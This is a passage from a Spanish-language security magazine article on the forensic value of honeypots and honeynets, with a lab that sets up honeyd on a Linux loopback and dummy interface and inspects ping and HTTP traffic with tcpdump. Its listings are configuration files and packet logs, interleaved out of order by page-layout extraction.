desconocidas. Por ejemplo si detectamos
tráfico masivo y desconocido
en la red se puede intuir que el atacante
ya esta adentro, entonces con
un honeypots se puede capturar el
username y el password del hacker,
permiten la activación de keyloggins,
la detección del email del atacante,
permiten ver el contenido del chat
del hacker con terceros, etc. En
concreto: Se puede establecer como
funciona el atacante que es lo que
hace y como me hace daño en forma
detallada.
Honeynets
Se define una Honeynet como un
conjunto de Honeypots altamente
interactivos diseñados para la
investigación y la obtención de
información sobre atacantes. Una
Honeynet es una arquitectura, no
un producto o un software determinado.
El objetivo es el de hacer creer
al atacante que está ante una red
real, entonces de deben añadir los
distintos elementos que conforman
una arquitectura de red
Tradicionalmente, la mayoría de
los sistemas de seguridad han sido
siempre de carácter defensivo.
IDS, Firewalls y demás soluciones
se basan en la defensa de
los sistemas de la organización,
y cuando un ataque o vulnerabilidad
es detectado de inmediato se
procede a corregirlo, entonces el
método tradicional no es proactivo
es correctivo por lo tanto no hay
mejora intrínseca o proactividad
propia de los sistemas. Las Honeynets
miran de cambiar esta
actitud mediante el estudio de los
ataques y atacantes. Obtener nuevos
patrones de comportamiento y
nuevos métodos de ataque con el
objetivo de prevenirlos en los sistemas
reales.
Sin Honeynets, cada vez que
se produzca un ataque “nuevo” y
exitoso a un sistema real existente,
este dejará de dar servicio y se ve-
44 www.hakin9.org/es
rá comprometido. Con las Honeynets,
un ataque exitoso o nuevo
no tiene porqué afectar a ningún
Listado 4. Interfaces nuevas del sistema con comando ifconfig
ifconfig dummy0 192.168.100.1 netmask 255.255.255.0 up
ifconfig –a
dummy0 Link encap:Ethernet HWaddr 00:00:00:00:00:00
inet addr:192.168.100.1 Bcast:192.168.100.255 Mask:255.255.255.0
UP BROADCAST RUNNING NOARP MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:21 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:2485 (2.4 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:36 errors:0 dropped:0 overruns:0 frame:0
TX packets:36 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:3024 (2.9 KiB) TX bytes:3024 (2.9 KiB)
Listado 5. Procesa de prueba interfaces
ping 192.168.100.1
PING 192.168.100.1 (192.168.100.1): 56 data bytes
64 bytes from 192.168.100.1: icmp_seq=0 ttl=64 time=0.0 ms
64 bytes from 192.168.100.1: icmp_seq=1 ttl=64 time=0.0 ms
64 bytes from 192.168.100.1: icmp_seq=2 ttl=64 time=0.0 ms
--- 192.168.100.1 ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
ping 127.0.0.1
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.0 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.0 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.0 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
Listado 6. Honey .cfg nuevo archivo de configuracion creado en
directorio del usario el root
vi /root/honey.cfg
create template
set template personality "OpenBSD 2.6-2.8"
set template default tcp action block
set template uid 1000 gid 1000
bind 192.168.100.3 template
set 192.168.100.3 uptime 1327650
Como ayudan
Dado que su objetivo fundamental es la
construcción de un perfil del atacante
permite la detección de las “0 days” vulnerabilidades
que son tan intimidantes
como las amenazas desconocidas.

sistema real. Además perderá el
factor sorpresa, ya que habremos
obtenidos datos precisos de su
ataque en el estudio de los logs,
cosa que permitirán contrarrestarlo
de una manera más eficiente.
Al igual que los Honeypots, la
cantidad y calidad de información
producida es muy importante, ya
que cualquier actividad existente
es sospechosa.
Laboratorio: Honeypots
Detectar intentos de ataques a
nuestra red mediante el uso de honeypots.
Prerrequisitos: Obtener
el software Honeyd: software para
la implementación de honeypots,
http://www.honeyd.org Actividades:
Interfaces de red virtuales
Ejecute el comando ifconfig para
ver que interfaces de red tiene su
estación Linux, para hacer el laboratorio.
Resultado 1.1: Que interfaces
obtiene? El comando ifconfig -a debe
mostrar las siguientes interfaces:
(Listing 1)
La interface loopback representa
el stack de protocolo por defecto.
Su sentido es probar conexiones
simulando todo el stack TCP/IP. En
este laboratorio la usaremos para
nuestra práctica. La IP asociada
a la interface de loopback es la
127.0.0.1, y de hecho, por esa interface
responde toda la subred
127.0.0.0/8.
Compruebe la conectividad hacia
la IP de loopback. En concreto
ejecute los siguientes comandos:
ping 127.0.0.1
ping 127.0.0.2
Resultado 1.2: Que resultados obtiene?
A que se debe? Indique el
rango de IPs que contestaran a ping
y verifíquelo.
Respuesta:
• Todos los IPs contestan por
que esa es la función de la interface
loopback, en particular
El valor forense de los honeypots
Listado 7. Tráfico de honeyp
honeyd[566]: listening on lo: ip
honeyd[566]: Sending ICMP Echo Reply: 192.168.100.2 -> 192.168.100.1
honeyd[566]: Sending ICMP Echo Reply: 192.168.100.2 -> 192.168.100.1
honeyd[566]: Sending ICMP Echo Reply: 192.168.100.2 -> 192.168.100.1
honeyd[566]: Sending ICMP Echo Reply: 192.168.100.3 -> 192.168.100.1
honeyd[566]: Sending ICMP Echo Reply: 192.168.100.3 -> 192.168.100.1
honeyd[566]: Sending ICMP Echo Reply: 192.168.100.4 -> 192.168.100.1
honeyd[566]: Sending ICMP Echo Reply: 192.168.100.4 -> 192.168.100.1
honeyd[566]: Sending ICMP Echo Reply: 192.168.100.5 -> 192.168.100.1
honeyd[566]: Sending ICMP Echo Reply: 192.168.100.5 -> 192.168.100.1
honeyd[566]: Sending ICMP Echo Reply: 192.168.100.6 -> 192.168.100.1
honeyd[566]: Sending ICMP Echo Reply: 192.168.100.6 -> 192.168.100.1
honeyd[566]: Sending ICMP Echo Reply: 192.168.100.6 -> 192.168.100.1
honeyd[566]: Sending ICMP Echo Reply: 192.168.100.100 -> 192.168.100.1
honeyd[566]: Sending ICMP Echo Reply: 192.168.100.100 -> 192.168.100.1
honeyd[566]: Sending ICMP Echo Reply: 192.168.100.100 -> 192.168.100.1
honeyd[566]: Sending ICMP Echo Reply: 192.168.100.200 -> 192.168.100.1
honeyd[566]: Sending ICMP Echo Reply: 192.168.100.200 -> 192.168.100.1
honeyd[566]: Sending ICMP Echo Reply: 192.168.100.200 -> 192.168.100.1
honeyd[566]: Sending ICMP Echo Reply: 192.168.100.254 -> 192.168.100.1
honeyd[566]: Sending ICMP Echo Reply: 192.168.100.254 -> 192.168.100.1
honeyd[566]: Sending ICMP Echo Reply: 192.168.100.254 -> 192.168.100.1
…
Listado 8. Logs
tcpdump: listening on lo
00:19:18.850198 192.168.100.1 > 192.168.100.2: icmp: echo request (DF)
00:19:18.850301 192.168.100.2 > 192.168.100.1: icmp: echo reply
00:19:18.850732 uoc.32768 > uoc.domain: 59933+ PTR? 2.100.168.192.inaddr.arpa.
(44) (DF)
00:19:18.850741 uoc > uoc: icmp: uoc udp port domain unreachable [tos 0xc0]
00:19:18.850810 uoc.32768 > uoc.domain: 59933+ PTR? 2.100.168.192.inaddr.arpa.
(44) (DF)
00:19:18.850815 uoc > uoc: icmp: uoc udp port domain unreachable [tos 0xc0]
00:19:18.850906 uoc.32768 > uoc.domain: 59934+ PTR? 1.100.168.192.inaddr.arpa.
(44) (DF)
00:19:18.850911 uoc > uoc: icmp: uoc udp port domain unreachable [tos 0xc0]
00:19:18.850967 uoc.32768 > uoc.domain: 59934+ PTR? 1.100.168.192.inaddr.arpa.
(44) (DF)
00:19:18.850971 uoc > uoc: icmp: uoc udp port domain unreachable [tos 0xc0]
00:19:19.848096 192.168.100.1 > 192.168.100.2: icmp: echo request (DF)
00:19:19.848149 192.168.100.2 > 192.168.100.1: icmp: echo reply
00:19:20.848091 192.168.100.1 > 192.168.100.2: icmp: echo request (DF)
00:19:20.848144 192.168.100.2 > 192.168.100.1: icmp: echo reply
00:19:29.206180 192.168.100.1 > 192.168.100.4: icmp: echo request (DF)
00:19:29.206256 192.168.100.4 > 192.168.100.1: icmp: echo reply
00:19:29.206553 uoc.32768 > uoc.domain: 59935+ PTR? 4.100.168.192.inaddr.arpa.
(44) (DF)
00:19:29.206561 uoc > uoc: icmp: uoc udp port domain unreachable [tos 0xc0]
00:19:29.206622 uoc.32768 > uoc.domain: 59935+ PTR? 4.100.168.192.inaddr.arpa.
(44) (DF)
00:19:29.206626 uoc > uoc: icmp: uoc udp port domain unreachable [tos 0xc0]
00:19:30.198089 192.168.100.1 > 192.168.100.4: icmp: echo request (DF)
00:19:30.198140 192.168.100.4 > 192.168.100.1: icmp: echo reply
00:19:31.198085 192.168.100.1 > 192.168.100.4: icmp: echo request (DF)
00:19:31.198141 192.168.100.4 > 192.168.100.1: icmp: echo reply
48 packets received by filter
0 packets dropped by kernel
www.hakin9.org/es
45

kit
sirve para hacer simulación del
modelo cliente/servidor en forma
local.
Para probarlo se propone construir un
shell que hace un ping para un solo
intento hacia todos los Ips del segemento
127.0.0.0, debiendo responder
desde el IP 127.0.0.1 hasta el IP
127.0.0.255 o broadcast: (Listing 2).
Nota:
• Observe los espacios antes y
después del paréntesis cuadrado
en la instrucción if [
$sec…
Para probarlo
digite sh ping.sh 255 | tee
resultado.txt
Si mira el archivo resultado.txt debería
ver lo siguiente: (Listado 3)
Ahora generemos un entorno de
simulación. Disponemos únicamente
de un servidor con Linux y simularemos
otro conjunto de hosts en la
propia máquina para disminuir costos
de recursos en hardware para el
laboratorio:
• Esta máquina la conectaremos a
una subred, también con direccionamiento
privado.
Recordemos que el direccionamiento
privado no figura en las
tablas de routing de la red Internet.
En concreto, para nuestra red simulada
usaremos las direcciones
192.168.100.0/24.
Lo que nos proponemos en primer
lugar es dar a la máquina una
dirección de esa red. Como hemos
supuesto que no disponemos de
ninguna otra interface, generaremos
una. Linux nos permite generar
hasta 2 interfaces virtuales. Son
las llamadas interfaces dummy.
Así, conectaremos nuestro host de
ejemplo a la subred 192.168.100.0
con el comando:
ifconfig dummy0 192.168.100.1 netmask
255.255.255.0 up
Listado 9. Verificacion de lineas
create default
set default personality "FreeBSD 2.2.1-STABLE"
set default default tcp action block
add default tcp port 80 "sh /tmp/web.sh"
set default uid 1000 gid 1000
bind 192.168.100.3 default
set 192.168.100.3 uptime 1327650
Listado 10. Realización de un ping al ip de servidor
#!/bin/sh
DATE=`date`
cat

• La opcion netmask indica mascara
de red
• La opcion up indica que se habilite
de inmediato
Compruebe que la interface se ha
creado, ejecutando nuevamente el
comando:
ifconfig –a
Al acabar este apartado, debemos
tener una máquina funcionando
que responde a las IPs 127.0.0.1 y
192.168.100.1.
La red 192.168.100.0/24 la usaremos
para colocar máquinas ‘trampa’
para detectar cualquier intento de ataque
que se esté produciendo en ella.
Resultado 1.2: Compruebe la conectividad
ejecutando ping a la nueva
dirección. Compruebe tambien
que interfaces presenta ahora el
sistema (con el comando ifconfig -a).
Respuesta: (Listado 4). Únicamente
deben aparecer las dos interfaces lo
y dummy0.
Ahora pruebe las interfaces:
(Listado 5). Los comandos ping anteriores
prueban que las interfaces
están dadas de alta pues responden
al comando ping.
Detección de escaneos
y ataques. Configuración
de un honeypot
En la actualidad, muchos de los ataques
que se producen en las redes
tienen lugar mediante un proceso en
dos fases: un escaneo previo para
detectar máquinas susceptibles de
ser atacadas, y el ataque posterior.
El objetivo de este apartado es ser
capaces de detectar esos ataques y
guardar la información relevante.
En el caso real, la red de nuestra
organización sería la que en nues-
Clasificación / taxonomía
• Taxonomia de los honeypots
• Honeypot de producción
( Producción Honeypot System )
• Honeypot de investigación
( Research Honeypot System )
El valor forense de los honeypots
Listado 12. Obtención: log del comando tcpdump -ilo
2006-01-25-18:39:06.0556 tcp(6) S 192.168.100.1 32804 192.168.100.3 80 [Linux
2.4 lo0]
2006-01-25-18:39:06.0556 tcp(6) - 192.168.100.3 80 192.168.100.1 32804: 44 SA
2006-01-25-18:39:09.0749 tcp(6) - 192.168.100.3 80 192.168.100.1 32804: 40 A
2006-01-25-18:39:11.0026 tcp(6) - 192.168.100.3 80 192.168.100.1 32804: 40 A
2006-01-25-18:39:11.0029 tcp(6) - 192.168.100.3 80 192.168.100.1 32804: 552 A
2006-01-25-18:39:11.0029 tcp(6) - 192.168.100.3 80 192.168.100.1 32804: 552 A
2006-01-25-18:39:11.0029 tcp(6) - 192.168.100.3 80 192.168.100.1 32804: 74 A
2006-01-25-18:39:11.0029 tcp(6) - 192.168.100.3 80 192.168.100.1 32804: 40 FA
2006-01-25-18:39:11.0032 tcp(6) - 192.168.100.3 80 192.168.100.1 32804: 40 A
2006-01-25-18:39:21.0038 tcp(6) E 192.168.100.1 32804 192.168.100.3 80: 9 058
2006-01-25-18:39:27.0412 icmp(1) - 192.168.100.1 192.168.100.3: 8(0): 84
[Linux 2.4 lo0]
2006-01-25-18:39:27.0412 icmp(1) - 192.168.100.3 192.168.100.1: 0(0): 84
2006-01-25-18:39:28.0408 icmp(1) - 192.168.100.1 192.168.100.3: 8(0): 84
[Linux 2.4 lo0]
2006-01-25-18:39:28.0409 icmp(1) - 192.168.100.3 192.168.100.1: 0(0): 84
2006-01-25-18:39:29.0408 icmp(1) - 192.168.100.1 192.168.100.3: 8(0): 84
[Linux 2.4 lo0]
2006-01-25-18:39:29.0409 icmp(1) - 192.168.100.3 192.168.100.1: 0(0): 84
2006-01-25-18:39:30.0408 icmp(1) - 192.168.100.1 192.168.100.3: 8(0): 84
[Linux 2.4 lo0]
2006-01-25-18:39:30.0409 icmp(1) - 192.168.100.3 192.168.100.1: 0(0): 84
2006-01-25-18:39:38.0096 icmp(1) - 192.168.100.1 192.168.100.254: 8(0): 84
[Linux 2.4 lo0]
2006-01-25-18:39:38.0096 icmp(1) - 192.168.100.254 192.168.100.1: 0(0): 84
006-01-25-18:39:39.0088 icmp(1) - 192.168.100.1 192.168.100.254: 8(0): 84
[Linux 2.4 lo0]
2006-01-25-18:39:39.0089 icmp(1) - 192.168.100.254 192.168.100.1: 0(0): 84
2006-01-25-18:39:40.0088 icmp(1) - 192.168.100.1 192.168.100.254: 8(0): 84
[Linux 2.4 lo0]
2006-01-25-18:39:40.0089 icmp(1) - 192.168.100.254 192.168.100.1: 0(0): 84
2006-01-25-18:39:41.0088 icmp(1) - 192.168.100.1 192.168.100.254: 8(0): 84
[Linux 2.4 lo0]
2006-01-25-18:39:41.0089 icmp(1) - 192.168.100.254 192.168.100.1: 0(0): 84
INTERNET
DMZ
WIRELESS
SERVIDORE DATOS TITICOS
Figura 1. Envios de paquete
www.hakin9.org/es
UTM
LAN
SWITCH
WAN
VLAN 8
VLAN 7
VLAN 6
VLAN 5
VLAN 4
VLAN 3
VLAN 2
VLAN 1
47

kit
Listado 13. Interface
tcpdump: listening on lo
20:44:19.378034 192.168.100.1.32773 > 192.168.100.3.www: S 438126803:
438126803(0) win 32767 (DF)
20:44:19.378178 192.168.100.3.www > 192.168.100.1.32773: S 1300529704:
1300529704(0) ack 438126804 win 16430 (DF)
20:44:19.378191 192.168.100.1.32773 > 192.168.100.3.www: . ack 1 win 32767
(DF)
20:44:19.378803 uoc.32768 > uoc.domain: 4448+ PTR? 3.100.168.192.inaddr.arpa.
(44) (DF)
20:44:19.378814 uoc > uoc: icmp: uoc udp port domain unreachable [tos 0xc0]
20:44:19.378844 uoc.32768 > uoc.domain: 4448+ PTR? 3.100.168.192.inaddr.arpa.
(44) (DF)
20:44:19.378849 uoc > uoc: icmp: uoc udp port domain unreachable [tos 0xc0]
20:44:19.378902 uoc.32768 > uoc.domain: 4449+ PTR? 1.100.168.192.inaddr.arpa.
(44) (DF)
20:44:19.378906 uoc > uoc: icmp: uoc udp port domain unreachable [tos 0xc0]
20:44:19.378921 uoc.32768 > uoc.domain: 4449+ PTR? 1.100.168.192.inaddr.arpa.
(44) (DF)
20:44:19.378925 uoc > uoc: icmp: uoc udp port domain unreachable [tos 0xc0]
20:44:19.379486 192.168.100.1.32773 > 192.168.100.3.www: P 1:430(429) ack 1
win 32767 (DF)
20:44:19.384103 192.168.100.3.www > 192.168.100.1.32773: . ack 430 win 16001
20:44:19.442926 192.168.100.3.www > 192.168.100.1.32773: . 1:513(512) ack 430
win 16430
20:44:19.442951 192.168.100.1.32773 > 192.168.100.3.www: . ack 513 win 33768
(DF)
20:44:19.443284 192.168.100.3.www > 192.168.100.1.32773: . 513:1025(512) ack
430 win 16430
20:44:19.443291 192.168.100.1.32773 > 192.168.100.3.www: . ack 1025 win 33768
(DF)
20:44:19.443374 192.168.100.3.www > 192.168.100.1.32773: . 1025:1059(34) ack
430 win 16430
20:44:19.443379 192.168.100.1.32773 > 192.168.100.3.www: . ack 1059 win 33768
(DF)
20:44:19.443688 192.168.100.3.www > 192.168.100.1.32773: F 1059:1059(0) ack
430 win 16430
20:44:19.443803 192.168.100.1.32773 > 192.168.100.3.www: F 430:430(0) ack
1060 win 33768 (DF)
20:44:19.443835 192.168.100.3.www > 192.168.100.1.32773: . ack 431 win 16430
20:44:22.165224 uoc.32774 > uoc.16001: S 446820472:446820472(0) win 32767
(DF)
20:44:22.165243 uoc.16001 > uoc.32774: R 0:0(0) ack 446820473 win 0 (DF)
48 packets received by filter
Listado 14. inicio de sesión
dummy0 Link encap:Ethernet HWaddr 00:00:00:00:00:00
inet addr:192.168.100.1 Bcast:192.168.100.255 Mask:255.255.255.0
inet6 addr: fe80::200:ff:fe00:0/64 Scope:Link
UP BROADCAST RUNNING NOARP MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:3 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:210 (210.0 b)
48 www.hakin9.org/es
tro ejemplo es la 192.168.100.0/24.
Lo que vamos a hacer es incluir
en ella un conjunto de máquinas
‘honeypot’ que permitan detectar
los ataques que en ella se producen.
El funcionamiento de honeyd
es muy simple y potente, esencialmente
consiste en indicarle al
software que escuche sobre una
determinada dirección y que opere
de una forma con los paquetes que
reciba.
En el directorio del usuario root
cree un nuevo archivo de configuración
llamado honey.cfg, para
el servicio honeyd, por ejemplo:
(Listado 6).
Para enrutar el tráfico de la red
192.168.100.0 ejecute el comando:
route add -net 192.168.100.0/24 gw
127.0.0.1
La opción –net indica la red y la opción
gw indica pasarela o gateway. Ahora
inicie el servicio honeyd en la consola
virtual CTRL-ALT-F2:
honeyd -d -i lo -f honey.cfg -l
log.honeyd
La pantalla no muestra mensajes hasta
que no e haga ping hacia la interface
de red. Ahora haga ping en la consola
virtual CTRL-ALT-F1:
ping 192.168.100.2
Observe el tráfico que el honeyd
presenta en la consola virtual CTRL-
ALT-F2:
honeyd[566]: started with -d -i lo -f
honey.cfg
Warning: Impossible SI range in
Class fingerprint Windows NT 4
SP3 (Listado 7) El comando ping
Definición de honeypot
Se define Honeypot como un recurso
de red destinado a ser atacado y comprometido
por el atacante.
El honeypot proporciona información
sobre el atacante antes de que se comprometan
los sistemas reales.

INTERNET
DMZ
WIRELESS
SERVIDORE DATOS TITICOS
Figura 2. Envios de paquete
debe responder no solo al IP
192.168.100.2 sino a cualquier IP
del segmento, pruebe haciendo ping
a varias IP de la red 192.168.100.0.
Ahora al parar el servicio honeyd
con las teclas CTRL-C, las IPs del
segmento 192.168.100.0 no deben
responder. !! Los servicios reales
no pueden correr simultáneamente
con la simulación honeyd !! Vuelva
a subir el servicio honeyd en la
consola virtual CTRL-ALT-F2, ahora
observe el tráfico con un sniffer
Listado 15. Tráfico de tipo DNS
como tcpdump en la consola virtual
CTRL-ALT-F3:
tcpdump –i lo | tee logs.tcpdump
Observemos los logs: (Listado 8)
Se debería ver claramente el envío
del requerimiento del comando ping
y la respuesta respectiva, además
se debería ver que el trafico DNS
muestra que no se puede resolver
la reversa del IP 192.168.100.2 es
decir específicamente el registro
20:44:19.378034 192.168.100.1.32773 > 192.168.100.3.www: S 438126803:
438126803(0) win 32767 (DF)
20:44:19.378178 192.168.100.3.www > 192.168.100.1.32773: S 1300529704:
1300529704(0) ack 438126804 win 16430 (DF)
20:44:19.378191 192.168.100.1.32773 > 192.168.100.3.www: . ack 1 win 32767
(DF)
Listado 16. Secuencia del tráfico
UTM
WAN
VLAN 8
20:44:19.378803 uoc.32768 > uoc.domain: 4448+ PTR? 3.100.168.192.inaddr.arpa.
(44) (DF)
20:44:19.378814 uoc > uoc: icmp: uoc udp port domain unreachable [tos 0xc0]
20:44:19.378844 uoc.32768 > uoc.domain: 4448+ PTR? 3.100.168.192.inaddr.arpa.
(44) (DF)
20:44:19.378849 uoc > uoc: icmp: uoc udp port domain unreachable [tos 0xc0]
20:44:19.378902 uoc.32768 > uoc.domain: 4449+ PTR? 1.100.168.192.inaddr.arpa.
(44) (DF)
20:44:19.378906 uoc > uoc: icmp: uoc udp port domain unreachable [tos 0xc0]
20:44:19.378921 uoc.32768 > uoc.domain: 4449+ PTR? 1.100.168.192.inaddr.arpa.
(44) (DF)
20:44:19.378925 uoc > uoc: icmp: uoc udp port domain unreachable [tos 0xc0]
LAN
SWITCH
VLAN 7
VLAN 6
VLAN 5
VLAN 4
VLAN 3
VLAN 2
VLAN 1
www.hakin9.org/es
49

kit
PTR no puede ser resuelto. Creación
de un honeypot para capturar
el tráfico del puerto 80 sobre el IP
192.168.100.3. Modifique el archivo
honey.cfg para que:
• Responda al tráfico ICMP
• Tenga abierto el puerto 80 TCP
• Cuando reciba una petición por el
puerto 80 TCP ejecute el comando
sh /tmp/web.sh y guarde los
intentos de ataque en un log.
Resultado 2.1: Que posibles utilidades
se ven en este software en el diario vivir
de una organización conectada a Internet?
Como ayudaría en la detección de
Listado 17. Análisis del tráfico
problemas? Respuesta: Cree un nuevo
archivo de configuración honey.cfg
para que aparezcan los nuevos requerimientos:
(Listado 9) Nota:
• Es clave la instrucción set default
default tcp action block para que
el servidor web responda al requerimiento.
Si prueba todas las
posibilidades únicamente “block”
funcionara.
• La ruta para el shell web.sh en
knoppix-std es: /usr/share/doc/
honeyd/examples/web.sh
• La ruta para el shell web.sh en
Linux Auditor es: /usr/share/
honeyd/scripts/web.sh
50 www.hakin9.org/es
Honeynets
Se define a Honeynet como un conjunto
de Honeypots altamente interactivos
diseñados para la investigación y la
obtención de información sobre atacantes.
Honeynet es una arquitectura, no
un producto o un software deteminado.
El objetivo es el de hacer creer al
atacante que esta ante una red “real”
entonces se deben anadir los distintos
elementos que conforman una arquitectura
de red.
Haga una copia hacia la carpeta
/tmp y verifique que el shell web.sh
contenga las siguientes líneas:
22:26:47.647867 192.168.100.1 > 192.168.100.2: icmp: echo request (DF)
22:26:47.648175 192.168.100.2 > 192.168.100.1: icmp: echo reply
22:26:48.641215 192.168.100.1 > 192.168.100.2: icmp: echo request (DF)
22:26:48.641333 192.168.100.2 > 192.168.100.1: icmp: echo reply
22:26:49.641206 192.168.100.1 > 192.168.100.2: icmp: echo request (DF)
22:26:49.641309 192.168.100.2 > 192.168.100.1: icmp: echo reply
22:26:49.981941 192.168.100.1.32782 > 192.168.100.3.www: S 2386902885:2386902885(0) win 32767 (DF) [tos 0x10]
22:26:49.982318 192.168.100.3.www > 192.168.100.1.32782: S 3385644204:3385644204(0) ack 2386902886 win 16430
(DF)
22:26:49.982332 192.168.100.1.32782 > 192.168.100.3.www: . ack 1 win 32767 (DF) [tos 0x10]
22:26:50.641214 192.168.100.1 > 192.168.100.2: icmp: echo request (DF)
22:26:50.641461 192.168.100.2 > 192.168.100.1: icmp: echo reply
22:26:51.641205 192.168.100.1 > 192.168.100.2: icmp: echo request (DF)
22:26:51.641303 192.168.100.2 > 192.168.100.1: icmp: echo reply
22:26:52.641208 192.168.100.1 > 192.168.100.2: icmp: echo request (DF)
22:26:52.641324 192.168.100.2 > 192.168.100.1: icmp: echo reply
22:26:53.641207 192.168.100.1 > 192.168.100.2: icmp: echo request (DF)
22:26:53.641315 192.168.100.2 > 192.168.100.1: icmp: echo reply
22:26:54.641204 192.168.100.1 > 192.168.100.2: icmp: echo request (DF)
22:26:54.641299 192.168.100.2 > 192.168.100.1: icmp: echo reply
22:26:55.641206 192.168.100.1 > 192.168.100.2: icmp: echo request (DF)
22:26:55.641290 192.168.100.2 > 192.168.100.1: icmp: echo reply
22:26:55.854772 192.168.100.1.32782 > 192.168.100.3.www: P 1:17(16) ack 1 win 32767 (DF) [tos 0x10]
22:26:55.854815 192.168.100.3.www > 192.168.100.1.32782: . ack 17 win 16414
22:26:56.564418 192.168.100.1.32782 > 192.168.100.3.www: P 17:19(2) ack 1 win 32767 (DF) [tos 0x10]
22:26:56.564479 192.168.100.3.www > 192.168.100.1.32782: . ack 19 win 16428
22:26:56.567622 192.168.100.3.www > 192.168.100.1.32782: . 1:513(512) ack 19 win 16430
22:26:56.567636 192.168.100.1.32782 > 192.168.100.3.www: . ack 513 win 33768 (DF) [tos 0x10]
22:26:56.567664 192.168.100.3.www > 192.168.100.1.32782: . 513:1025(512) ack 19 win 16430
22:26:56.567669 192.168.100.1.32782 > 192.168.100.3.www: . ack 1025 win 33768 (DF) [tos 0x10]
22:26:56.567693 192.168.100.3.www > 192.168.100.1.32782: . 1025:1059(34) ack 19 win 16430
22:26:56.567698 192.168.100.1.32782 > 192.168.100.3.www: . ack 1059 win 33768 (DF) [tos 0x10]
22:26:56.632032 192.168.100.3.www > 192.168.100.1.32782: F 1059:1059(0) ack 19 win 16430
22:26:56.641218 192.168.100.1 > 192.168.100.2: icmp: echo request (DF)
22:26:56.671194 192.168.100.1.32782 > 192.168.100.3.www: . ack 1060 win 33768 (DF) [tos 0x10]
22:26:56.682492 192.168.100.2 > 192.168.100.1: icmp: echo reply
22:26:56.682629 192.168.100.1.32782 > 192.168.100.3.www: F 19:19(0) ack 1060 win 33768 (DF) [tos 0x10]
22:26:56.682659 192.168.100.3.www > 192.168.100.1.32782: . ack 20 win 16430
22:26:57.641210 192.168.100.1 > 192.168.100.2: icmp: echo request (DF)
22:26:57.641298 192.168.100.2 > 192.168.100.1: icmp: echo reply
22:26:58.641206 192.168.100.1 > 192.168.100.2: icmp: echo request (DF)
22:26:58.641275 192.168.100.2 > 192.168.100.1: icmp: echo reply

(Listado 10). Ahora reinicie el servicio
honeyd con el nuevo archivo
de configuración, hágalo en la consola
virtual CTRL-ALT-F2. Baje el
servicio cancelando el proceso con
la secuencia de teclas CTRL-C:
honeyd -d -i lo -f honey.cfg -l
log.honeyd
Ejecute los siguientes comandos en la
terminal virtual CTRL-ALT F1:
Pruebe que el servidor web responda:
telnet 192.168.100.3 80
Trying 192.168.100.3...
to 192.168.100.3. Escape character is
'^]'.
Digite:
GET /
Y dos veces la tecla enter. Vera
una pantalla del servidor MS Windows
simulada por linux. Haga un
ping al IP del servidor 192.168.100.3:
(Listado 11) Se deben obtener los
siguientes logs en el tcpdump: (Listado
12)
Evaluación del tráfico
de red generado desde
y hacia el honeypot
Uno de los programas más usados
actualmente para la captura de tráfico
es ethereal. En este apartado
lo usaremos para capturar el tráfico
Sobre el Autor
Armando Carvajal-Ingeniero de Sistemas
de la Universidad INCCA de Colombia,
postgrado en Construcción de
Software para redes de la Universidad
de los Andes. Se desempeña como gerente
técnico de la empresa Globaltek
Security.
Bibliografía
www.Honeynet.org
Grime,R., A.(2005). Honeypots for Windows,
Editorial Apres
Spitzne, L. (2003). Honeypots, Tracking
Hackers, Addison Wesley
El valor forense de los honeypots
Listado 18. Análisis del tráfico
22:26:47.647867 192.168.100.1 > 192.168.100.2: icmp: echo request (DF)
22:26:47.648175 192.168.100.2 > 192.168.100.1: icmp: echo reply
22:26:48.641215 192.168.100.1 > 192.168.100.2: icmp: echo request (DF)
22:26:48.641333 192.168.100.2 > 192.168.100.1: icmp: echo reply
22:26:49.641206 192.168.100.1 > 192.168.100.2: icmp: echo request (DF)
22:26:49.641309 192.168.100.2 > 192.168.100.1: icmp: echo reply
Listado 19. Analisis de trafico
22:26:49.981941 192.168.100.1.32782 > 192.168.100.3.www: S 2386902885:
2386902885(0) win 32767 (DF) [tos 0x10]
22:26:49.982318 192.168.100.3.www > 192.168.100.1.32782: S 3385644204:
3385644204(0) ack 2386902886 win 16430 (DF)
22:26:49.982332 192.168.100.1.32782 > 192.168.100.3.www: . ack 1 win 32767
(DF) [tos 0x10]
de la sesión http generado en el
apartado anterior. Una primera
introducción a la captura de tráfico
la hemos comentado en el apartado
anterior. La utilidad tcpdump
permite la captura de tráfico. La
forma más simple es mediante la
ejecución de:
tcpdump –i
Revise el sitio: http://www.arrakis.es/
~terron/tcpdump.html
Resultado 3.1: Ejecute el comando
tcpdump y realiza una conexión
web como la solicitada en la parte II
de la practica. Observe los paquetes
e identifique la conexión tcp que
INTERNET
DMZ
WIRELESS
SERVIDORE DATOS TITICOS
Figura 3. Envios de paquete
www.hakin9.org/es
UTM
tiene lugar. ¿Es posible capturar paquetes
ARP? ¿A que se debe?
Respuesta: Se debería ver algo
como este log del comando tcpdump
-i lo (Listado 13) Las anteriores líneas
no muestran tráfico ARP, es decir no
se puede capturar tráfico ARP debido
a que la interface de red dummy0 no
tiene el flag ARP activado por que esta
no tiene MAC.
En concreto la interface no tiene
MAC Address, el protocolo ARP
dado un IP responde con la MAC
address de la interface de red y esta
no lo tiene pues es virtual.
Si revisa el archivo /proc/net/arp
no contiene Mac Address pues en
esta maquina no hay tarjetas físicas
LAN
SWITCH
WAN
VLAN 8
VLAN 7
VLAN 6
VLAN 5
VLAN 4
VLAN 3
VLAN 2
VLAN 1
51

kit
Figura 4. Honeypots ''Trampa
perfecta para detectar a agresores
activadas. Observe la interface:
(Listado 14).Las líneas: (Listado
